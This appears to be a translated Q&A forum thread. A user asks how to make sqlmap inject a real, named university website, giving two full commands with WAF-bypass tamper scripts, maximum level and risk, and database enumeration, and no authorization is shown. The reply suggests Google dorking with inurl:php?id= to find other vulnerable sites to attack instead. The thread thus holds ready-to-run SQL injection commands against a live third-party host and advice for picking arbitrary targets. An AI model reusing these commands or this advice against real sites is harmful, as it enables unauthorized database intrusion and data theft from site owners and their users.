1

我从 sqlmap 开始,我有以下疑问:当我尝试使用 sqlmap(试图绕过 waf)使用这个片段时:

sqlmap.py -u "http://prefing.umsa.edu.bo/index.php?option=com_newsfeeds&view=newsfeed&id=1&feedid=1&Itemid=18" --dbs --dbms=mysql --time-sec=10 --hex --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords

或者这个:

sqlmap.py -u "http://prefing.umsa.edu.bo/index.php?view=article&catid=35:pagina-principal&id=44:inicio-central&format=pdf" --dbs --dbms=mysql --time-sec=10 --hex --string --regexp --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords

我看到控制台中出现了:

[警告] 启发式(基本)测试表明 GET 参数“选项”可能无法注入 [警告] 启发式(基本)测试表明 GET 参数“视图”可能无法注入

还尝试在我的网站内找到一个类似于:http ://www.cafe53rd.com/menu.php?item_id= 3 因为我检查了这种 url 最容易访问但我找不到该网站我审计。

在以下站点中制作它的正确代码是什么(“http://prefing...”)

对不起,我的英语不好。非常感谢。

4

1 回答 1

1

This error just suggests that the type of Injection Technique which is being executed does not give positive responses. I already faced it and solved it by getting an alternate link. I suggest find some other vulnerable links , using search inurl:php?id= and then insert the link in sqlmap.

于 2015-07-27T00:03:35.647 回答